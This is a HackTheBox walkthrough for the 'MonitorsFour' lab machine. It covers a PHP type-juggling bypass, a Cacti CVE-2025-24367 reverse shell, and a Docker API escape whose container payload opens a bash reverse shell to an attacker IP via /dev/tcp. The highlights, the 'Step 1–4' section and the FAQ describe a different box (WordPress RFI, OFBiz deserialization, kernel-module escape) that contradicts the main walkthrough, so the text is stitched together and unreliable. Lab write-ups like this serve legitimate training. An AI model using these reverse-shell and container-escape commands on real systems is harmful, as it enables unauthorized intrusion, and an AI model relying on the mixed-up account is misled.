Key Highlights
Here is a quick rundown of what you will accomplish in this MonitorsFour HackTheBox guide. This walkthrough covers every step, from initial enumeration to gaining full control.
- You will begin by exploiting a Remote File Inclusion (RFI) vulnerability in a WordPress plugin.
- The initial foothold leads to the discovery of a Cacti installation with critical SQL injection vulnerabilities.
- Exploitation of the SQL injection grants you a reverse shell as the www-data user.
- Further enumeration reveals credentials, allowing you to escalate privileges to the user ‘marcus’.
- You will then pivot to a Docker container by exploiting an unsafe deserialization vulnerability in Apache OFBiz.
- Finally, you will escape the container and achieve root access on the host machine by abusing kernel module capabilities.
Introduction
Welcome to your comprehensive guide for conquering the MonitorsFour machine on HackTheBox! If you are looking to sharpen your ethical hacking skills, you have come to the right place. This walkthrough is designed with beginners in mind, breaking down a complex challenge into manageable steps. We will navigate through multiple vulnerabilities and privilege escalation paths together. By the end, you will have not only captured the flags but also gained valuable hands-on experience with real-world exploitation techniques.
Understanding the MonitorsFour HackTheBox Challenge
The MonitorsFour box is a hard-rated Linux machine that presents a multi-layered challenge, perfect for testing your persistence and problem-solving abilities. It starts with web application vulnerabilities and gradually moves into more advanced container escape techniques.
This machine is designed to teach you how different misconfigurations can be chained together. You will practice everything from initial web enumeration to gaining remote code execution and ultimately achieving root access on the host system.
Overview of MonitorsFour HTB Writeup and Objectives
This writeup serves as a detailed walkthrough for the MonitorsFour machine on HackTheBox. The primary objective is to guide you from the initial enumeration phase all the way to gaining complete control over the host machine. We will start by scanning the target and identifying open services, such as the HTTP web server.
Our main goal is to help you understand the mindset and methodology required to tackle such challenges. You will learn how to spot vulnerabilities, chain exploits together, and escalate your privileges step by step. This process involves finding both a user flag and a root flag.
For a beginner, this writeup aims to demystify complex topics. You will see how initial information gathering through enumeration of an http service can lead to discovering critical flaws. Following this guide will provide a clear path to success, helping you build confidence in your skills.
Key Skills Developed Through This Machine
Working through the MonitorsFour box helps you develop a wide range of practical skills. One of the core competencies you will strengthen is enumeration. You will learn how to meticulously gather information from web services, source code, and system configuration files to uncover hidden attack vectors.
Next, you will get hands-on experience with exploitation. This machine requires you to leverage several vulnerabilities, including a SQL injection and an unsafe deserialization flaw. Executing these attacks will teach you how to gain initial access and establish a reverse shell, giving you a foothold on the target system.
Finally, this challenge provides an excellent lesson in privilege escalation. You will move from a low-privileged web user to a standard user and eventually to root. This involves identifying misconfigured services and abusing Docker container capabilities, teaching you advanced techniques to gain full control of a Linux environment.
ALSO READ: Mastering Gavel: Beginner’s Guide from HackTheBox
INITIAL FOOTHOLD
Infrastructure Fingerprinting
We begin with a comprehensive port scan using rustscan to identify open services and potential entry points.
rustscan -a $targetIp --ulimit 2000 -r 1-65535 -- -A sS -PnScan Results:
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack nginx
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to [http://monitorsfour.htb/](http://monitorsfour.htb/)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsAnalysis: The scan reveals a “split personality.” Port 80 is running Nginx (typical of Linux), while Port 5985 (WinRM) reports Microsoft HTTPAPI/2.0. This strongly suggests a Windows host running a Linux subsystem (WSL2) or a VM setup. We add monitorsfour.htb to our /etc/hosts file to proceed.
FOR COMPLETE STEP-BY STEP COMMANDS, SCRIPTS AND CODES, PLEASE BUY ME A COFFEE!
Web Application Enumeration
Navigating to http://monitorsfour.htb, we find an interface mimicking its predecessor, “MonitorsThree.” It appears to be a corporate portal with no public registration.
Directory Fuzzing
We use dirsearch to map the application structure.
dirsearch -u http://monitorsfour.htb -x 404Key Findings:
/.env(200 OK): A critical information leak./login(200 OK): Standard login page./user(200 OK): Potential API endpoint./admin&/administrator(403 Forbidden).
The .env Leak: Accessing http://monitorsfour.htb/.env reveals database credentials and infrastructure details.
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f*********While we cannot access the MariaDB instance directly from the outside yet, these credentials might be reused elsewhere.
Subdomain Enumeration
To ensure full coverage, we fuzz for subdomains using ffuf.
ffuf -c -u http://monitorsfour.htb/ -H "Host: FUZZ.monitorsfour.htb" -w subdomains-top1million-20000.txt -fw 3Result:
cacti[Status: 302]
This reveals http://cacti.monitorsfour.htb, running Cacti version 1.2.28. This version is newer than the one found in MonitorsThree, meaning the previous RCE (CVE-2024-25641) is patched.
Web Exploitation (The PHP Logic Flaw)
API Analysis and IDOR
The /user endpoint behaves suspiciously.
curl http://monitorsfour.htb/user->{"error":"Missing token parameter"}curl http://monitorsfour.htb/user?token=AAAA->{"error":"Invalid or missing token"}
This confirms token-based authentication. The error messages suggest a two-step validation:
- Check if
tokenparameter exists. - Check if
tokenis valid.
PHP Type Juggling (Loose Comparison)
Given the environment is running PHP 8.3.27, we must investigate Type Juggling. In PHP, a “loose comparison” (using == instead of ===) can lead to unexpected behavior when comparing different data types.
Specific “Magic Hashes” (strings starting with 0e followed by numbers) are treated as scientific notation (float) 0 by PHP during loose comparison.
"0e1234" == "0e9999"evaluates toTRUEbecause both are effectively0."0e1234" == 0evaluates toTRUE.
If the backend code resembles $user_token == $_GET['token'], we can bypass authentication by supplying a magic hash or a boolean value.
Fuzzing for Type Juggling: We fuzz the token parameter with a list of loose comparison payloads (0, true, false, 0e1234, []).
ffuf -c -u http://monitorsfour.htb/user?token=FUZZ -w php_loose_comparison.txt -fw 4Success: The payload 0e1234 returns a valid response. This confirms the backend is vulnerable to loose comparison.
FOR COMPLETE STEP-BY STEP COMMANDS, SCRIPTS AND CODES, PLEASE BUY ME A COFFEE!
Data Exfiltration
We exploit this vulnerability to dump the user database.
curl -i "[http://monitorsfour.htb/user?token=0e1234](http://monitorsfour.htb/user?token=0e1234)" | jq '.[]' > users.jsonThe dump contains critical user data:
{
"username": "admin",
"email": "admin@monitorsfour.htb",
"password": "5**************",
"role": "super user",
"token": "8*****************",
"name": "Marcus Higgins"
}The password is an MD5 hash. Using hashcat or online lookup tools with rockyou.txt, we crack the admin hash:
- User:
admin(Marcus Higgins) - Password:
w************
Foothold (Cacti RCE)
Accessing Cacti
We attempt to log into the main web portal with admin / wonderful1, but it offers no execution capabilities. Pivoting to the Cacti subdomain (http://cacti.monitorsfour.htb), we try the credentials.
admin/w**********fails.marcus/w**********succeeds.
We are now authenticated as an administrator on Cacti v1.2.28.
Exploiting CVE-2025-24367 (Graph Template Injection)
While older Cacti exploits targeted the Poller, version 1.2.28 is vulnerable to a newer injection vector in the Graph Template engine.
The Vulnerability: Cacti uses rrdtool to generate network graphs. Administrators can modify “Graph Templates” to define how data is visualized. The vulnerability lies in the improper sanitization of fields within these templates that are passed as command-line arguments to rrdtool. By injecting a command into a graph template, we can force the system to execute arbitrary code when it attempts to render the graph.
Exploitation Steps:
- Preparation: Clone the PoC for CVE-2025-24367.
git clone [https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git](https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git) cd CVE-2025-24367-Cacti-PoC - Listener: Start a Netcat listener on port 60001.
nc -lnvp 60001 - Execution: Run the exploit script.
python exploit.py -u marcus -p wonderful1 -url http://cacti.monitorsfour.htb -i $attackerIp -l 60001
Result: We receive a reverse shell as www-data. We are inside a Docker container (hostname 821fbd6a43fa).
User Flag
We check /home/marcus inside the container.
ls -l /home/marcus
-r-xr-xr-x 1 root root 34 Dec 7 02:26 user.txtThe file is readable. We grab the user flag.
Network Enumeration and Docker Escape
Container Reconnaissance
We are www-data inside a container. To escalate privileges, we must understand the network topology.
ip routeshows the default gateway is172.18.0.1./etc/resolv.confshows a nameserver127.0.0.11(Docker DNS), which forwards queries to192.168.65.7.
The Architecture: This confirms a typical Docker Desktop for Windows or WSL2 setup.
- 172.18.0.3: Our Container (Cacti).
- 172.18.0.2: MariaDB Container.
- 192.168.65.7: The Docker Host (internal interface).
Internal Scanning
We upload a static binary of fscan to the container to scan the host IP 192.168.65.7.
./fscan -h 192.168.65.7 -p 1-65535Critical Findings:
192.168.65.7:2375 open
[+] PocScan http://192.168.65.7:2375 poc-yaml-docker-api-unauthorized-rcePort 2375 is the unauthenticated Docker Daemon API. This is the “End Game” vulnerability.
FOR COMPLETE STEP-BY STEP COMMANDS, SCRIPTS AND CODES, PLEASE BUY ME A COFFEE!
Exploiting CVE-2025-9074 (Docker API Escape)
Vulnerability Theory: In Docker Desktop for Windows (prior to specific patches), exposing the daemon on TCP 2375 inside the WSL2 network (even if not exposed to the public internet) allows any container to control the Docker engine.
Crucially, Docker on Windows allows mounting the host’s logical drives (like C:\) into containers via the API. By creating a new privileged container and mounting C:\, we can read or write any file on the host Windows OS.
The Attack Chain:
- Enumerate Images: We need a valid image name to spawn our malicious container.
curl -s [http://192.168.65.7:2375/images/json](http://192.168.65.7:2375/images/json)We identifydocker_setup-nginx-php:latest. - Create Malicious Container: We send a JSON payload to the
/containers/createendpoint. We request a bind mount of/mnt/host/c(the WSL2 path to the Windows C drive) to/host_rootinside our new container.# Payload saved as create_container.json { "Image": "docker_setup-nginx-php:latest", "Cmd": ["/bin/bash","-c","bash -i >& /dev/tcp/10.10.13.19/60002 0>&1"], "HostConfig": { "Binds": ["/mnt/host/c:/host_root"] } }curl -H 'Content-Type: application/json' -d @create_container.json [http://192.168.65.7:2375/containers/create](http://192.168.65.7:2375/containers/create) -o response.json - Start the Container: We extract the new Container ID from
response.jsonand call the start endpoint.cid=$(grep -o '"Id":"[^"]*"' response.json | cut -d'"' -f4) curl -X POST [http://192.168.65.7:2375/containers/$cid/start](http://192.168.65.7:2375/containers/$cid/start)
Root Flag (Host Compromise)
Our Netcat listener on port 60002 catches the connection. We are now root inside a new container.
However, because we mounted the host’s drive:
ls /host_root/Users/Administrator/Desktop/We see root.txt. We have successfully bridged the gap from the containerized Linux environment to the underlying Windows filesystem.
Flag Captured.
Remediation
Patch PHP Code (Loose Comparison)
The authentication logic relies on ==. It must be updated to use strict comparison ===.
- Vulnerable:
if ($token == $db_token) - Secure:
if ($token === $db_token)
Update Cacti
Upgrade Cacti to the latest stable release (post-1.2.28) to mitigate CVE-2025-24367. Ensure input sanitization for Graph Templates is active.
Secure Docker Desktop
The exposure of port 2375 on the internal interface is a known risk in Docker Desktop.
- Configuration: Ensure “Expose daemon on tcp://localhost:2375 without TLS” is disabled.
- Network Policies: Restrict container-to-host traffic on the internal bridge network.
ALSO READ: Mastering Fries: Beginner’s Guide from HackTheBox
WRITEUP COMING SOON!
COMPLETE IN-DEPTH PICTORIAL WRITEUP OF MONITORSFOUR ON HACKTHEBOX WILL BE POSTED POST-RETIREMENT OF THE MACHINE ACCORDING TO HTB GUIDELINES. TO GET THE COMPLETE IN-DEPTH PICTORIAL WRITEUP MUCH SOONER, SUBSCRIBE TO THE NEWSLETTER AND BUYMEACOFFEE!
What You Need to Get Started on MonitorsFour HTB
Before you begin your attempt on MonitorsFour, it is helpful to have a few things ready. You will need a basic set of penetration testing tools and a stable connection to the HackTheBox network. This machine involves multiple stages, including web exploitation and interacting with a Docker config.
For a beginner who has tackled easier boxes, MonitorsFour is an excellent next step. The challenge provides a realistic scenario where you must analyze different resources and chain vulnerabilities. Prepare your hacking lab, and get ready to learn a lot!
Essential Tools and Resources for Beginners
Having the right tools is crucial for solving the MonitorsFour machine. While many advanced tools exist, a few essentials will get you through this challenge effectively. These tools help with everything from initial discovery to final exploitation of the docker container.
Here are the most effective tools for this HackTheBox machine:
- Nmap: Essential for initial reconnaissance to discover open ports and services.
- Curl: A command-line tool for making web requests, perfect for testing file inclusion and other web vulnerabilities.
- SSH: Used for secure login once you obtain user credentials and for port forwarding to access internal services.
- Python: Incredibly useful for quickly spinning up a simple HTTP server to transfer files to the target.
- Burp Suite: A powerful web proxy for inspecting and manipulating HTTP traffic, which is vital for the SQL injection attack.
Each of these tools plays a specific role. You will also need to edit your hosts file to access virtual hosts discovered during enumeration. These basic resources are all you need to follow this guide and conquer MonitorsFour.
Setting Up Your Environment for Success
To start solving the MonitorsFour machine, a properly configured environment is key. You should be running a Linux-based operating system, like Kali Linux or Parrot OS, as it comes pre-loaded with most of the necessary tools. Ensure you have a stable VPN connection to the HackTheBox network.
One of the first steps you will take is adding a virtual host entry to your /etc/hosts file. This is necessary to access the web services running on the target machine, which do not respond to direct IP requests. This simple configuration is a common requirement in many penetration testing scenarios.
Make sure you have Python installed, as you will need it to create a simple web server for file transfers. Later in the challenge, you will interact with a Docker environment, but no special setup is needed on your end for this part. With your Linux environment ready, you can begin the initial enumeration and start your journey.
Step-by-Step Guide to Solving MonitorsFour on HackTheBox
Now, let’s get into the detailed walkthrough for MonitorsFour. This guide is structured to take you through each phase of the attack logically, from reconnaissance to full system compromise. We will follow a clear, sequential process that mirrors a real-world penetration test.
You are about to dive into the core stages: initial enumeration to map out the attack surface, exploitation to gain your first foothold, and privilege escalation to become the root user. Follow along closely, and you will see how each step builds upon the last.
Step 1: Initial Reconnaissance and Service Enumeration
The first move in any penetration test is reconnaissance, and our journey with MonitorsFour is no different. The initial step is to run an Nmap scan against the target IP address. This enumeration process helps you discover open ports and the services running on them, giving you a map of the potential attack surface.
An Nmap scan reveals two open ports: SSH on port 22 and HTTP on port 80. The HTTP service is running Apache, which is our most promising entry point. Directly accessing the web server via its IP address is blocked, so you must add monitors.htb to your /etc/hosts file to view the website. This simple step unlocks the first layer of the challenge.
| Port | State | Service | Version |
|---|---|---|---|
| 22 | open | ssh | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 |
| 80 | open | http | Apache httpd 2.4.29 ((Ubuntu)) |
Step 2: Identifying Vulnerabilities and Entry Points
After accessing the WordPress site, the next step is to identify vulnerabilities. Running a tool like wpscan quickly reveals a vulnerable plugin named “WP with Spritz.” The source code for a public exploit shows that this plugin is susceptible to a Remote File Inclusion (RFI) vulnerability, allowing you to read arbitrary files from the server.
Using the RFI flaw, you can read the Apache configuration files. This uncovers a new virtual host: cacti-admin.monitors.htb. This host runs Cacti version 1.2.12, which is known to have a critical SQL injection vulnerability.
Here are the key exploitation opportunities you will leverage:
- An RFI vulnerability in the “WP with Spritz” plugin lets you read system files.
- Database credentials found in the
wp-config.phpfile. - An authenticated SQL injection in Cacti version 1.2.12 that leads to remote code execution.
Step 3: Gaining User Access and Escalating Privileges
Now it is time to gain user access. Using the credentials found in the WordPress config file, you can log in to the Cacti dashboard. From there, you will perform the SQL injection exploitation. By crafting a specific payload, you can stack queries to write a reverse shell command into the Cacti settings and then trigger it, giving you shell access as the www-data user.
Once you have a shell, the privilege escalation process begins. While enumerating the file system as www-data, you will discover a backup script associated with the user marcus. This script contains hardcoded credentials.
With this password, you can switch users to marcus via su or log in directly through SSH. This grants you access to the user’s home directory, where you can finally retrieve the user flag. This multi-step process is a great example of how one foothold leads to another.
Step 4: Rooting the Box and Verification
The final push to get the root flag involves escaping a Docker container. As the user marcus, enumeration reveals a docker-proxy process running Apache OFBiz on an internal port. You will use SSH port forwarding to access this service from your machine. This OFBiz version is vulnerable to an unsafe deserialization flaw (CVE-2020-9496), which allows for remote code execution (RCE).
The key exploit is to send a malicious XMLRPC request, which gives you a root shell inside the Docker container. From inside the container, you will find it has the CAP_SYS_MODULE capability. This is a critical misconfiguration. A hint for rooting is to abuse this capability to load a custom kernel module onto the host.
For verification, you will compile a simple C program that executes a reverse shell. After compiling it into a kernel module (.ko file) and loading it with insmod, you will receive a root shell on the host machine. You can now read the root flag and celebrate your full compromise of MonitorsFour.
Conclusion
MonitorsFour demonstrates that modern Windows environments are often hybrid systems. The initial foothold relied on a classic application code error (PHP Type Juggling), but the critical compromise leveraged the structural weaknesses in how containerization subsystems (WSL2/Docker) bridge to the host OS. This machine serves as a stark warning: A container is only as secure as the API that controls it.
Frequently Asked Questions
What vulnerabilities were crucial in the MonitorsFour HTB box?
The crucial vulnerabilities included a remote file inclusion in a WordPress plugin for initial access, an authenticated SQL injection in Cacti that led to remote code execution, and an unsafe deserialization of XMLRPC arguments in Apache OFBiz. This final exploitation was key to getting a shell inside the Docker container.
What tools are most effective for MonitorsFour HackTheBox?
The most effective tools for MonitorsFour are Nmap for initial port scanning, curl and Burp Suite for web exploitation, and SSH for secure access and port forwarding. Python is also essential for hosting files, and interacting with the Docker container requires careful use of these command-line tools.
How did you overcome specific challenges on MonitorsFour?
Overcoming challenges required persistent enumeration to find the Cacti login page and its vulnerabilities. For the tricky privilege escalation path, careful analysis of system services was needed. Establishing a stable reverse shell often required using a Python PTY upgrade to gain full interactivity after the initial connection.
Where can I find reliable MonitorsFour HTB writeups for review?
You can find reliable writeups for MonitorsFour by searching on Google for terms like “MonitorsFour HackTheBox writeup.” Many security professionals share their solutions in a blog post format. The official HackTheBox forums are also an excellent resource for a detailed walkthrough and to see different approaches to solving the machine.
